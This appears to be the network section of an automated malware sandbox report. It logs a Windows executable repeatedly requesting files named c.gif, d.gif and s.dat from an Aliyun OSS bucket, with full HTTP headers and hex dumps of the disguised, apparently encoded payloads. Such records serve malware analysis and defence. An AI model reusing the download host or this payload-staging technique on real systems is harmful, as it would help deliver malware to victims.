                                                                            2025-01-15 08:02:28 UTC4096INData Raw: b6 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d
                                                                            Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: 18 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8
                                                                            Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                                            2025-01-15 08:02:28 UTC4096INData Raw: 51 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf
                                                                            Data Ascii: QmHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJ


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.44974039.103.20.174437276C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:02:36 UTC105OUTGET /c.gif HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Do
                                                                            Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                            2025-01-15 08:02:37 UTC546INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:02:36 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 10681
                                                                            Connection: close
                                                                            x-oss-request-id: 67876B9CD4BE203739C38267
                                                                            Accept-Ranges: bytes
                                                                            ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                                            Last-Modified: Mon, 13 Jan 2025 12:21:18 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 10287299869673359293
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000104
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                                            x-oss-server-time: 13
                                                                            2025-01-15 08:02:37 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                            2025-01-15 08:02:37 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                                                            Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                                                            2025-01-15 08:02:37 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                                                            Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.44974139.103.20.174437276C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:02:38 UTC105OUTGET /d.gif HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Do
                                                                            Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                            2025-01-15 08:02:38 UTC547INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:02:38 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 3892010
                                                                            Connection: close
                                                                            x-oss-request-id: 67876B9EDCC23B373742502B
                                                                            Accept-Ranges: bytes
                                                                            ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                                            Last-Modified: Mon, 13 Jan 2025 12:21:29 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 3363616613234190325
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000104
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                                            x-oss-server-time: 48
                                                                            2025-01-15 08:02:38 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                            Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                                                            Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                                                            Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                                                            Data Ascii: -J;wuwu{}uG`uWu{Q6
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                                                            Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                                                            Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                                                            Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                                            Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                                            Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                                            2025-01-15 08:02:38 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                                            Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.44974239.103.20.174437276C:\Users\user\Desktop\138745635-72645747.116.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 08:02:46 UTC105OUTGET /s.dat HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Do
                                                                            Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                            2025-01-15 08:02:46 UTC561INHTTP/1.1 200 OK
                                                                            Server: AliyunOSS
                                                                            Date: Wed, 15 Jan 2025 08:02:46 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 28272
                                                                            Connection: close
                                                                            x-oss-request-id: 67876BA66D28FD3136273C25
                                                                            Accept-Ranges: bytes
                                                                            ETag: "E586AE76EC0DD7D02078372710160152"
                                                                            Last-Modified: Wed, 15 Jan 2025 08:02:37 GMT
                                                                            x-oss-object-type: Normal
                                                                            x-oss-hash-crc64ecma: 16171786153598011117
                                                                            x-oss-storage-class: Standard
                                                                            x-oss-ec: 0048-00000113
                                                                            Content-Disposition: attachment
                                                                            x-oss-force-download: true
                                                                            Content-MD5: 5YauduwN19AgeDcnEBYBUg==
                                                                            x-oss-server-time: 27
                                                                            2025-01-15 08:02:46 UTC3535INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                                            Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
